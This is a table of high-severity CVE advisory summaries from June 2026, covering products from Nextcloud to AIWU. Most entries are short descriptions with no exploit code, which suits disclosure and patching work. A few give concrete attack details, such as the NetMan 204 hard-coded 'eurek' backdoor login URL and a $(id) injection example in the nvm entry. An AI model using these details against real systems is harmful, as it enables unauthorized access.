| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. In Nextcloud Server from versions 32.0.0 to before 32.0.9, and 33.0.0 to before 33.0.3, an authenticated attacker who knows another user's principal URL could send a request that grants them full access to that user's calendar, because of improper authorization controls in the calendar backend. With that access, the attacker would be able to view and modify the calendar. It is recommended that the Nextcloud Server is upgraded to 33.0.3 or 32.0.9. It is recommended that the Nextcloud Enterprise Server is upgraded to 33.0.3, 32.0.9, 31.0.14.5, 30.0.17.9, 29.0.16.16, 28.0.14.17, 27.1.11.26, 26.0.13.26, 25.0.13.29, 24.0.12.34, 23.0.12.35, 22.2.10.39, or 21.0.9.23. | 2026-06-01 | 8.1 | CVE-2026-45281 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From versions 0.7.0 to before 0.7.7, 0.8.0 to before 0.8.10, 0.9.0 to before 0.9.8, and 1.0.0 to before 1.0.4, an authenticated attacker with access to the Tables app may be able to execute arbitrary SQL queries of up to 20 bytes in length through a stored injection. With carefully crafted input it is possible to break out of the length limitation. The attacker could use this to extract information from the database or modify data. This issue has been patched in versions 0.7.7, 0.8.10, 0.9.8, 1.0.4, and 2.0.0. | 2026-06-01 | 8.2 | CVE-2026-45545 |
| nextcloud--security-advisories | Nextcloud is an open source content collaboration platform. From versions 0.9.0 to before 0.9.7, and 1.0.0 to before 1.0.2, a missing sanitization in the Tables app allowed a user with access to the tables app to perform a limited SQL injection in the ORDER BY statement of a query. Compared to normal SQL injections, the ORDER BY is limited to extracting a single bit of information per request or to make the database wait for a given time. This issue has been patched in versions 0.9.7 and 1.0.2. | 2026-06-01 | 7.1 | CVE-2026-45722 |
| nextlevelbuilder--GoClaw | A vulnerability was found in nextlevelbuilder GoClaw up to 3.11.3. This impacts the function FsBridge.WriteFile of the file internal/sandbox/fsbridge.go of the component write_file Tool. Performing a manipulation results in os command injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The pull request to fix this issue awaits acceptance. | 2026-06-01 | 7.3 | CVE-2026-10219 |
| nextlevelbuilder--GoClaw | A security vulnerability has been detected in nextlevelbuilder GoClaw up to 3.11.3. This affects the function resolveAuth of the file internal/http/auth.go of the component Webhook Verification Handler. The manipulation leads to missing authentication. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The project tagged the reported issue as bug. | 2026-06-02 | 7.3 | CVE-2026-10617 |
| NI--NI-PAL | Improper input validation in the NI-PAL kernel driver may allow a local authenticated user to cause a denial of service by triggering a crash due to a NULL pointer dereference. This vulnerability affects NI-PAL 26.3.0 and prior versions on Windows and Linux. | 2026-06-02 | 7.1 | CVE-2026-8035 |
| NI--NI-PAL | Improper input validation in NI-PAL may allow a local authenticated user to access arbitrary system memory, potentially leading to privilege escalation. This vulnerability affects NI-PAL 26.3.0 and prior versions on Windows and Linux. | 2026-06-02 | 7.1 | CVE-2026-8036 |
| Nicheoffice--All in One Video Downloader | All in One Video Downloader 1.2 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the id parameter. Attackers can send requests to the admin interface with UNION-based SQL injection payloads in the id parameter to extract sensitive database information including usernames, databases, and version details. | 2026-06-04 | 8.2 | CVE-2019-25726 |
| NousResearch--hermes-agent | A vulnerability was determined in NousResearch hermes-agent up to 2026.4.30. Affected is the function _serve_plugin_skill/skill_view of the file tools/skills_tool.py. Executing a manipulation can lead to injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 7.3 | CVE-2026-10220 |
| NousResearch--hermes-agent | A vulnerability was identified in NousResearch hermes-agent up to 0.12.0. Affected by this vulnerability is the function _compress_context of the file run_agent.py. The manipulation leads to injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-01 | 7.3 | CVE-2026-10221 |
| nsauditor--NetShareWatcher | NetShareWatcher 1.5.8.0 contains a structured exception handler buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying malicious input. Attackers can craft a payload with overwritten SEH and NSEH pointers through the Restrictions custom filter field to trigger code execution when the Find function is invoked. | 2026-06-04 | 8.4 | CVE-2019-25733 |
| NVIDIA--NVTabular | NVIDIA NVTabular contains a vulnerability where an attacker could cause improper deserialization of untrusted data. A successful exploit of this vulnerability might lead to code execution, data tampering and information disclosure. | 2026-06-02 | 7.8 | CVE-2026-24221 |
| NVIDIA--NVTabular | NVIDIA NVTabular contains a vulnerability where an attacker could cause improper deserialization of untrusted data. A successful exploit of this vulnerability might lead to code execution, data tampering, and information disclosure. | 2026-06-02 | 7.8 | CVE-2026-24237 |
| nvm-sh--nvm | nvm (Node Version Manager) through 0.40.4 executes arbitrary commands from version strings supplied by the configured Node.js/io.js mirror. Commands such as `nvm install` read the available versions from the mirror's index.tab and use the selected version, without sanitization, to build download URLs and shell/awk commands. Two sinks are affected by the same untrusted input: nvm_download() built a curl/wget command string and ran it with `eval`, so a version field containing command substitution (for example $(id)) was executed by the local shell; and nvm_get_checksum() interpolated the version-derived download slug into an awk program, so a crafted version could execute arbitrary commands via awk's system(). An attacker who controls the configured mirror, supplies mirror content to a user or CI on a non-default mirror, or machine-in-the-middles a non-TLS mirror can therefore run arbitrary commands with the privileges of the user running nvm. The default mirror (https://nodejs.org over TLS) is not affected. Fixed on master (pending the next tagged release) by passing every argument as a literal argv element instead of using eval, by passing the value to awk as data via -v instead of interpolating it into the program, and by rejecting any version outside the Node.js/io.js version grammar before it is used. | 2026-06-04 | 7.5 | CVE-2026-10796 |
| OP-TEE--optee_os | OP-TEE is a Trusted Execution Environment (TEE) designed as a companion to a non-secure Linux kernel running on Arm Cortex-A cores using the TrustZone technology. Starting in version 3.16.0 and prior to 4.11.0, a use-after-free (UAF) race condition exists in the shared memory teardown logic of FF-A within OP-TEE SPMC/SP flows. This only applies when OP-TEE is configured as an SPMC for S-EL0 SPs, that is, with `CFG_SECURE_PARTITION=y`. The function `sp_mem_remove()`, responsible for freeing entries in `smem->receivers` and `smem->regions`, fails to acquire the global `sp_mem_lock` before performing the `free()` operations. Concurrently, other code paths, such as `sp_mem_get_receiver()`, iterate over these same lists without holding a lock, or, like `sp_mem_is_shared()`, iterate while holding the lock but are not serialized against the unprotected `free()` in `sp_mem_remove()`. This creates a cross-thread race where a thread iterating the list can acquire a pointer to an entry (e.g., `struct sp_mem_map_region` or `struct sp_mem_receiver`), after which another thread calls `sp_mem_remove()` and frees the object. When the first thread resumes and dereferences the pointer, the result is a use-after-free. Version 4.11.0 fixes the issue. | 2026-06-03 | 7.8 | CVE-2026-40290 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. Prior to version 0.9.0, the Postgres protocol parser assumes BIND message payloads contain a valid NUL-terminated portal name. A crafted empty or unterminated payload can make OBI slice beyond the end of the captured buffer and panic. This issue has been patched in version 0.9.0. | 2026-06-02 | 7.5 | CVE-2026-45678 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. From version 0.1.0 to before version 0.9.0, malformed MongoDB wire messages can trigger uncaught panics in the MongoDB TCP parser, allowing a remote unauthenticated attacker to crash the telemetry agent and cause a denial of service. The parser operates on raw attacker-controlled network payloads before the input is fully validated, so a single crafted message can terminate telemetry collection for the affected process or node. This issue has been patched in version 0.9.0. | 2026-06-02 | 7.5 | CVE-2026-45685 |
| open-telemetry--opentelemetry-ebpf-instrumentation | OpenTelemetry eBPF Instrumentation provides eBPF instrumentation based on the OpenTelemetry standard. From version 0.7.0 to before version 0.9.0, a remotely reachable integer overflow in OBI's memcached text protocol parser can crash the OBI process and cause denial of service. When parsing memcached storage commands such as set, add, replace, append, prepend, or cas, OBI accepts extremely large <bytes> values and adds the payload delimiter length without checking for overflow. A crafted request with <bytes> set to math.MaxInt or math.MaxInt-1 causes the computed payload length to wrap negative and triggers a runtime panic in LargeBufferReader.Peek. This issue has been patched in version 0.9.0. | 2026-06-02 | 7.5 | CVE-2026-45686 |
| OpenStack--Mistral | OpenStack Mistral through 22.0.0 allows Arbitrary Remote Code Execution when the API is exposed. There are endpoints that allow code execution, which can lead to exfiltration of service credentials. | 2026-06-04 | 9.9 | CVE-2026-41283 |
| Osnexus--QuantaStor | OSNexus QuantaStor SDS Manager is vulnerable to SQL injection in the login endpoint. The username field is not properly sanitized before being incorporated into a SQL query, allowing an unauthenticated remote attacker to bypass authentication and log in as an administrator without supplying a valid password. | 2026-06-04 | 9.8 | CVE-2026-10880 |
| OTRS AG--OTRS | An improper input validation vulnerability in the OTRS or ((OTRS)) Community Edition database layer module allows an unauthenticated SQL injection which can lead to an authentication bypass. This issue only affects systems whose MySQL/MariaDB server is configured with the NO_BACKSLASH_ESCAPES SQL mode. This issue affects OTRS 7.0.x, 8.0.x, 2023.x, 2024.x, 2025.x, and 2026.x before 2026.4.x, and ((OTRS)) Community Edition 6.0.x. Products based on ((OTRS)) Community Edition are also very likely to be affected. | 2026-06-01 | 9.1 | CVE-2026-48188 |
| OTRS AG--OTRS | An improper neutralization of user-controllable input in OTRS or ((OTRS)) Community Edition ticket handling allows authenticated attackers to perform reflected cross-site scripting (XSS) attacks via crafted request parameters associated with ticket actions. By injecting malicious JavaScript into manipulated request URLs, attackers can execute arbitrary script code in the context of an authenticated agent session when the crafted link is opened. This issue affects OTRS 7.0.x. Note that ((OTRS)) Community Edition 6.x and earlier are vulnerable. Products based on ((OTRS)) Community Edition are also very likely to be affected. | 2026-06-01 | 7.1 | CVE-2026-48209 |
| Paroiciel--Paroiciel | Paroiciel 11.20 contains an SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the tRecIdListe parameter. Attackers can send GET requests to the trec.php endpoint with crafted SQL payloads to extract database information including table and column names. | 2026-06-01 | 8.2 | CVE-2018-25428 |
| Paroiciel--Paroiciel | Paroiciel 11.20 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the zProIdPro parameter. Attackers can send GET requests to zpro.php with crafted SQL payloads in the zProIdPro parameter to extract sensitive database information including usernames, databases, and version details. | 2026-06-01 | 7.1 | CVE-2018-25429 |
| Paroiciel--Paroiciel | Paroiciel 11.20 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the eGeqIdEquipe parameter. Attackers can send GET requests to the egeq.php endpoint with crafted SQL payloads to extract sensitive database information including version details and other data. | 2026-06-01 | 7.1 | CVE-2018-25430 |
| perfree--go-fastdfs-web | A flaw has been found in perfree go-fastdfs-web up to 1.3.7. Affected is the function checkServer of the file /install/checkServer of the component Installation Endpoint. Executing a manipulation can lead to server-side request forgery. The attack can be executed remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-06 | 7.3 | CVE-2026-11437 |
| Phoenix Contact--CHARX SEC-3150 | It is possible for an unauthenticated adjacent attacker to download log files of the controller, which may disclose some restricted information. | 2026-06-03 | 7.5 | CVE-2026-41032 |
| php-censor--php-censor | A vulnerability was found in php-censor up to 2.1.6. This affects an unknown function of the file src/Model/Build/GitBuild.php of the component Webhook Endpoint. Performing a manipulation of the argument commitId results in os command injection. The attack can be initiated remotely. The exploit has been made public and could be used. The patch is named cd68d102601320bd319d590b75f7652e66f0685f. It is recommended to apply a patch to fix this issue. | 2026-06-01 | 7.3 | CVE-2026-10273 |
| Pixastudio--Pixa Bank | Pixa Bank 2.0 contains an SQL injection vulnerability that allows unauthenticated attackers to extract sensitive data by injecting SQL code into the 'rib' parameter. Attackers can send POST requests to the agence-ajax.php endpoint with UNION-based SQL payloads to retrieve user information including names, email addresses, and phone numbers from the database. | 2026-06-01 | 8.2 | CVE-2026-49491 |
| plugcrux--Integration for Freshsales Contact Form 7, WPForms, Elementor, Gravity Forms and More | The Integration for Freshsales - Contact Form 7, WPForms, Elementor, Gravity Forms and More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Form Submission Data in all versions up to, and including, 1.0.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The injected payload only executes when a CRM API call fails for the submitted form and an administrator subsequently views the error log details modal in the WordPress admin panel. | 2026-06-06 | 7.2 | CVE-2026-8901 |
| Progress Software--LoadMaster | An OS command injection remote code execution vulnerability in the API of Progress ADC products allows an unauthenticated attacker to execute arbitrary commands on the LoadMaster appliance by exploiting unsanitized input in multiple command endpoints. | 2026-06-04 | 9.6 | CVE-2026-8037 |
| Progress Software--Sitefinity | CWE-522: Insufficiently Protected Credentials in web services in Progress Sitefinity versions 14.0.7700 to 14.4.8152, 15.0.8200 to 15.0.8234, 15.1.8300 to 15.1.8335, 15.2.8400 to 15.2.8441, 15.3.8500 to 15.3.8531, and 15.4.8600 to 15.4.8630 allows a remote unauthenticated attacker to obtain the plain-text credentials used to connect to the Sitefinity Insight service. Successful exploitation requires an active integration with Sitefinity Insight and a non-default site configuration. | 2026-06-02 | 10 | CVE-2026-7312 |
| Progress Software--Sitefinity | CWE-284: Improper Access Control in web services in Progress Sitefinity 15.4.8623 before 15.4.8630 allows a remote unauthenticated attacker to access content that should be restricted, resulting in full compromise of confidentiality, integrity, and availability of affected installations. | 2026-06-02 | 9.8 | CVE-2026-7198 |
| Progress Software--Sitefinity | CWE-20: Improper Input Validation in web services in Progress Sitefinity 14.1.x through 14.3.x, 14.4.x before 14.4.8152, 15.0.x before 15.0.8234, 15.1.x before 15.1.8335, 15.2.x before 15.2.8441, 15.3.x before 15.3.8531, and 15.4.x before 15.4.8630 allows a remote unauthenticated attacker to compromise the integrity and confidentiality of user accounts. Successful exploitation requires user interaction and a non-default site configuration. | 2026-06-02 | 8.8 | CVE-2026-7195 |
| Progress Software--Sitefinity | CWE-639: Authorization Bypass Through User-Controlled Key in web services in Progress Sitefinity 15.2.x before 15.2.8441, 15.3.x before 15.3.8531, and 15.4.x before 15.4.8630 allows a remote authenticated attacker to modify account properties of other users, potentially leading to account compromise. Successful exploitation requires knowledge of values that are not generally exposed to low-privileged users. | 2026-06-02 | 8.8 | CVE-2026-7201 |
| Progress Software--Sitefinity | CWE-522: Insufficiently Protected Credentials in web services in Progress Sitefinity versions 8.0.5700 to 13.3.7652 allows a remote authenticated attacker to obtain the plain-text credentials used to connect to the Sitefinity Insight service. Successful exploitation requires an active integration with Sitefinity Insight, a non-default site configuration and valid back-end authorization. | 2026-06-02 | 8.7 | CVE-2026-7313 |
| Qualcomm, Inc.--Snapdragon | Cryptographic Issue while processing a specific partition which allows unauthorized write access to load a customized bootloader. | 2026-06-01 | 8.2 | CVE-2026-24088 |
| Qualcomm, Inc.--Snapdragon | Memory corruption while using Strongbox due to missing bounds check. | 2026-06-01 | 8.8 | CVE-2026-25276 |
| Qualcomm, Inc.--Snapdragon | Memory corruption while using Strongbox due to buffer overflow. | 2026-06-01 | 8.8 | CVE-2026-25277 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when running a memory copy operation due to invalid writes caused by a null pointer. | 2026-06-01 | 7.8 | CVE-2025-59604 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when processing device identifier strings that exceed the expected maximum length. | 2026-06-01 | 7.8 | CVE-2025-59605 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when writing to invalid memory locations occurs due to heap memory exhaustion during secure data initialization. | 2026-06-01 | 7.8 | CVE-2025-59606 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when processing display command line information due to improper initialization of a variable. | 2026-06-01 | 7.2 | CVE-2026-24085 |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing fastboot OEM commands. | 2026-06-01 | 7.2 | CVE-2026-24087 |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing fastboot commands with invalid input. | 2026-06-01 | 7.2 | CVE-2026-24089 |
| Qualcomm, Inc.--Snapdragon | Cryptographic issue while processing partition table entries allows unauthorized modification of boot flow. | 2026-06-01 | 7.1 | CVE-2026-24090 |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing fastboot commands with improperly formatted input. | 2026-06-01 | 7.2 | CVE-2026-24091 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when processing fastboot commands to set display mode. | 2026-06-01 | 7.2 | CVE-2026-24092 |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing IOCTL calls for escape operations. | 2026-06-01 | 7.8 | CVE-2026-25258 |
| Qualcomm, Inc.--Snapdragon | Memory corruption while processing multiple IOCTL commands for escape operations. | 2026-06-01 | 7.8 | CVE-2026-25259 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when accessing shared buffers without validation of concurrent user-mode input modifications. | 2026-06-01 | 7.8 | CVE-2026-25260 |
| raisulislamg4--student_management_system_by_php | A vulnerability was detected in raisulislamg4 student_management_system_by_php up to 310d950e09013d5133c6b9210aff9444382d16d1. This issue affects some unknown processing of the file login_check.php of the component Login. Performing a manipulation of the argument Username results in sql injection. The attack may be initiated remotely. The exploit is now public and may be used. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 7.3 | CVE-2026-10225 |
| raisulislamg4--student_management_system_by_php | A flaw has been found in raisulislamg4 student_management_system_by_php up to 310d950e09013d5133c6b9210aff9444382d16d1. Impacted is an unknown function of the file delete.php. Executing a manipulation of the argument user_id/course_id/teacher_id/student_id/application_id can lead to sql injection. The attack may be launched remotely. The exploit has been published and may be used. This product operates on a rolling release basis, ensuring continuous delivery. Consequently, there are no version details for either affected or updated releases. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 7.3 | CVE-2026-10226 |
| raisulislamg4--student_management_system_by_php | A vulnerability has been found in raisulislamg4 student_management_system_by_php up to 310d950e09013d5133c6b9210aff9444382d16d1. The affected element is an unknown function of the file add_user_check.php of the component User Creation Handler. The manipulation of the argument role leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-01 | 7.3 | CVE-2026-10227 |
| Red Hat--Builds for Red Hat OpenShift | A flaw was found in the OpenShift Pipelines operator. The tekton-scheduler-rolebinding ClusterRoleBinding grants the system:authenticated group write access to Kueue and cert-manager custom resources via the tekton-scheduler-role ClusterRole. When Kueue or cert-manager CRDs are present on the cluster, any authenticated user can disrupt workload scheduling, tamper with scheduling priorities, delete other tenants' Workload objects, or induce cert-manager to overwrite TLS Secrets including the default ingress controller certificate. | 2026-06-04 | 9.6 | CVE-2026-10840 |
| Red Hat--Red Hat Ansible Automation Platform 2 | A flaw was found in ansible-core. The ansible-galaxy role install command processes dependency specifications from a role's meta/requirements.yml file. Due to improper neutralization of argument delimiters, a malicious role author can inject arbitrary git configuration flags through the src field. This allows arbitrary code execution on the machine of a user who installs the role via ansible-galaxy role install. | 2026-06-05 | 7.8 | CVE-2026-11332 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in Poppler's Splash backend. A remote attacker could exploit this vulnerability by crafting a malicious PDF file that, when rendered, triggers an integer overflow in the `tilingPatternFill` function. This overflow leads to an undersized heap memory allocation, allowing a subsequent out-of-bounds write. Successful exploitation could result in arbitrary code execution, information disclosure, or denial of service within the context of the application processing the PDF. | 2026-06-01 | 7.8 | CVE-2026-10118 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in rrdcached, a component of rrdtool. A local attacker with access to a rrdcached socket can exploit a stack-based buffer overflow by sending an oversized CREATE request. This vulnerability can lead to a denial of service by crashing the daemon or potentially allow for arbitrary code execution, impacting the integrity and confidentiality of data. | 2026-06-01 | 7.8 | CVE-2026-43958 |
| Red Hat--Red Hat Enterprise Linux 10 | A stack-based buffer overflow flaw was found in the X.Org X server and Xwayland. A mismatch between the X server and the libXfont2 library's maximum font name length can cause a stack buffer overflow during font alias resolution. The server allocates a 256 byte stack buffer but libXfont2's alias target name length is 1024 bytes. A font alias name between 257 and 1023 bytes causes the X server to copy that name into the undersized stack buffer without further checks. This may be used to crash the server, or for privilege escalation if the X server runs as root. | 2026-06-05 | 7.8 | CVE-2026-50256 |
| Red Hat--Red Hat Enterprise Linux 10 | A use-after-free flaw was found in the X.Org X server and Xwayland in miSyncDestroyFence(). A client that sets up multiple fence triggers can trigger a use-after-free function pointer call. An attacker would connect to the X server to set up a fence and await that fence, then a second X connection destroys the fence, causing the use-after-free. This may be used to crash the server, or for privilege escalation if the X server runs as root. | 2026-06-05 | 7.8 | CVE-2026-50257 |
| Red Hat--Red Hat Enterprise Linux 10 | A stack-based buffer overflow flaw was found in the X.Org X server and Xwayland. The X server has multiple stack buffers sized XkbMaxShiftLevel * XkbNumKbdGroups but CheckKeyTypes() does not verify or clamp non-canonical key types to XkbMaxShiftLevel. A client can change key types to excessive shift levels and trigger stack overflows. This is caused by an incomplete fix of CVE-2025-26597. This may be used to crash the server, or for privilege escalation if the X server runs as root. | 2026-06-05 | 7.8 | CVE-2026-50258 |
| Red Hat--Red Hat Enterprise Linux 10 | A stack-based buffer overflow flaw was found in the X.Org X server and Xwayland. _XkbSetMapChecks() declares a fixed-size stack buffer mapWidths[256] indexed by key type index. The helper function CheckKeyTypes() writes to this buffer at a client-controlled offset, allowing a stack buffer overflow. This may be used to crash the server, or for privilege escalation if the X server runs as root. | 2026-06-05 | 7.8 | CVE-2026-50259 |
| Red Hat--Red Hat Enterprise Linux 10 | A use-after-free flaw was found in the X.Org X server and Xwayland in FreeCounter(). A client that sets up multiple SyncCounters and awaits on those triggers can trigger a use-after-free when destroying those counters via a second client connection. This may be used to crash the server, or for privilege escalation if the X server runs as root. | 2026-06-05 | 7.8 | CVE-2026-50260 |
| Red Hat--Red Hat Enterprise Linux 10 | A use-after-free flaw was found in the X.Org X server and Xwayland in SyncChangeCounter(). A client that sets up multiple SyncCounters can trigger a use-after-free when destroying those counters via a second client connection while changing those counters. This may be used to crash the server, or for privilege escalation if the X server runs as root. | 2026-06-05 | 7.8 | CVE-2026-50261 |
| Red Hat--Red Hat Enterprise Linux 10 | An out-of-bounds write flaw was found in the X.Org X server and Xwayland in DRIGetBuffers/DRIGetBuffersWithFormat. A client that requests multiple DRI2BufferBackLeft attachments and one DRI2BufferFrontLeft can trigger an out-of-bounds heap write. This may be used to crash the server, or for privilege escalation if the X server runs as root. | 2026-06-05 | 7.8 | CVE-2026-50264 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in libinput. A local attacker with access to /dev/uinput can inject arbitrary udev properties through the libinput-device-group helper. This injection can lead to root code execution, for example, by exploiting REMOVE_CMD properties that are executed when a device is removed. This vulnerability allows an attacker to gain elevated privileges on the system. | 2026-06-05 | 7 | CVE-2026-50265 |
| Red Hat--Red Hat OpenShift Container Platform 4 | The Route OpenShift resource allows defining routes that make pods reachable at a subdomain through HAProxy. It was found that the checks performed on the spec.path YAML stanza in a Route document were insufficient and could allow a controlled injection into the HAProxy configuration. | 2026-06-02 | 8.8 | CVE-2026-1784 |
| Red Hat--Red Hat OpenShift Container Platform 4 | A flaw was found in the OpenShift Cloud Credential Operator Mint-mode IAM policies for AWS. Operator credentials are provisioned with account-wide scope for destructive actions rather than being restricted to cluster-owned resources, enabling cross-scope impact after credential compromise. | 2026-06-04 | 7.2 | CVE-2026-10843 |
| remix-run--react-router | React Router is a router for React. In versions 7.7.0 through 7.13.1, when using React Router's unstable React Server Components (RSC) APIs, there is a potential client-side Cross-Site Scripting (XSS) vulnerability in the RSC redirect handling if redirects come from untrusted sources. This does not impact applications that are not using the unstable RSC APIs in React Router. This is patched in version 7.13.2. | 2026-06-02 | 8 | CVE-2026-33245 |
| remix-run--react-router | React Router is a router for React. In versions 7.0.0 through 7.14.1, when using Framework Mode, a combination of steps could potentially allow unauthorized remote code execution (RCE) through external requests. This attack requires the application code to have an existing prototype pollution vulnerability, which can then be leveraged in a 2-step attack where the second step triggers unauthorized RCE on the remote server. This does not impact applications using Declarative Mode (`<BrowserRouter>`) or Data Mode (`createBrowserRouter/<RouterProvider>`). This is patched in version 7.14.2. | 2026-06-02 | 8.1 | CVE-2026-42211 |
| remix-run--react-router | React Router is a router for React. In versions 7.7.0 through 7.13.1, when using React Router's unstable React Server Components (RSC) APIs, there is a potential client-side Cross-Site Scripting (XSS) vulnerability in the RSC redirect handling if redirects come from untrusted sources. This does not impact applications that are not using the unstable RSC APIs in React Router. This is patched in version 7.13.2. | 2026-06-02 | 7.5 | CVE-2026-34077 |
| remix-run--react-router | React Router is a router for React. In versions 7.0.0 through 7.14.x of react-router and versions 2.10.0 through 2.17.4 of @remix-run/server-runtime, certain crafted requests can consume disproportionate server resources via unbounded path expansion in the __manifest endpoint, resulting in response time degradation and/or service unavailability for end users. This affects React Router Framework Mode applications as well as Remix applications. This does not impact applications using Declarative Mode (`<BrowserRouter>`) or Data Mode (`createBrowserRouter/<RouterProvider>`). This is patched in react-router version 7.15.0 and @remix-run/server-runtime version 2.17.5. | 2026-06-02 | 7.5 | CVE-2026-42342 |
| Riello UPS--NetMan 204 | NetMan 204 contains a hard-coded backdoor account with the username and password 'eurek' that grants administrative access. A remote, unauthenticated attacker can authenticate through the cgi-bin/login.cgi endpoint (for example /cgi-bin/login.cgi?username=eurek&password=eurek, which due to lax parameter validation can be shortened to /cgi-bin/login.cgi?username=eurek%20eurek) to obtain administrator privileges, allowing them to alter device configuration, enable the telnet/SSH services, and reset local user credentials. | 2026-06-05 | 9.8 | CVE-2025-71317 |
| Riello UPS--NetMan 204 | NetMan 204 fails to enforce authentication on its administrative pages and command endpoints. A remote, unauthenticated attacker can directly request administrative pages (such as administration.html, administration-commands.html, and configuration.html) to disclose sensitive information including LDAP configuration and active user details, and can invoke privileged UPS control commands - including shutdown, reboot, switch-on-bypass, and battery test - without supplying any credentials. | 2026-06-05 | 9.8 | CVE-2025-71318 |
| Rocketgenius Inc.--Gravity Forms | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Rocketgenius Inc. Gravity Forms allows Path Traversal. This issue affects Gravity Forms: from n/a through 2.10.0.1. | 2026-06-01 | 9.6 | CVE-2026-48866 |
| ROCm--aiter | AI Tensor Engine for ROCm (AITER) through 0.1.14 contains an unauthenticated remote code execution vulnerability in the MessageQueue.recv() function within shm_broadcast.py that allows unauthenticated remote attackers to execute arbitrary code by sending a malicious pickle payload to a ZMQ SUB socket with no authentication, HMAC, or format validation. Attackers who can reach the writer XPUB endpoint on the cluster network or supply a forged Handle with an attacker-controlled remote_subscribe_addr can deliver a crafted pickle payload that executes arbitrary code simultaneously as the inference worker process on every remote reader worker. | 2026-06-01 | 8.1 | CVE-2026-49121 |
| rxi--microtar | microtar through 0.1.0 contains a stack-based buffer overflow vulnerability in the raw_to_header() function in src/microtar.c that allows attackers to corrupt adjacent stack memory by supplying a crafted TAR archive with non-null-terminated name or linkname fields. The function uses strcpy() to copy 100-byte ustar format fields that lack null terminators, causing writes of up to 355 bytes into a 100-byte destination buffer when mtar_open(), mtar_find(), or mtar_read_header() process attacker-supplied TAR archives. | 2026-06-01 | 8.8 | CVE-2026-43623 |
| sayan365--student-management-system | A vulnerability was detected in sayan365 student-management-system up to 7f3c9ce7d410332335c2affac93a385485051800. This impacts an unknown function. The manipulation results in improper authentication. The attack can be executed remotely. The exploit is now public and may be used. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. Multiple endpoints are affected. The project was informed of the problem early through an issue report but has not responded yet. | 2026-06-02 | 7.3 | CVE-2026-10619 |
| Screets--Live Chat Unlimited | Live Chat Unlimited 2.8.3 contains a stored cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts through the chat input field. Attackers can submit payloads containing script tags and event handlers that execute in the admin area, enabling cookie theft or forced redirects to malicious websites. | 2026-06-04 | 7.2 | CVE-2019-25737 |
| Seagull Software, LLC.--BarTender 2010 | Seagull Software BarTender 2010, 2016, and 2019 contain an unauthenticated remote code execution vulnerability in the .NET Remoting service exposed on TCP port 7375 via BtSystem.Service.exe. The service registers an unauthenticated singleton endpoint - BarTenderSystem for BarTender 2016 <= R9, and DataServiceSingleton for BarTender 2019 <= R10 - configured with BinaryServerFormatterSinkProvider and TypeFilterLevel set to Full. An unauthenticated remote attacker can exploit .NET Remoting object unmarshalling to read or write arbitrary files on the server using the .NET WebClient class, or coerce NTLMv2 authentication by supplying a UNC path to an attacker-controlled server, enabling sensitive credential disclosure, remote code execution, or lateral movement depending on service account privileges and network environment. The service runs in the context of NT AUTHORITY\SYSTEM. | 2026-06-04 | 9.8 | CVE-2026-25550 |
| Seagull Software, LLC.--BarTender 2021 | Seagull Software BarTender 2021 R1 through 12.0.1 contains an insecure deserialization vulnerability that allows low-privileged local users to escalate privileges. The DataServiceSingleton .NET Remoting endpoint is bound to localhost on TCP port 7375 via BtSystem.Service.exe, limiting the attack surface to local access only. The endpoint is configured with BinaryServerFormatterSinkProvider and TypeFilterLevel set to Full. A low-privileged local attacker can send YSoSerial.NET-generated BinaryFormatter payloads to the localhost-bound endpoint to achieve code execution as NT AUTHORITY\SYSTEM. | 2026-06-04 | 7.8 | CVE-2026-25551 |
| Select-Themes--WaveRide | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes WaveRide allows PHP Local File Inclusion. This issue affects WaveRide: from n/a through 1.4. | 2026-06-02 | 8.1 | CVE-2026-39553 |
| Sergey--AIWU | Incorrect Privilege Assignment vulnerability in Sergey AIWU allows Privilege Escalation. This issue affects AIWU: from n/a through 1.4.17. | 2026-06-01 | 9.8 | CVE-2026-48879 |
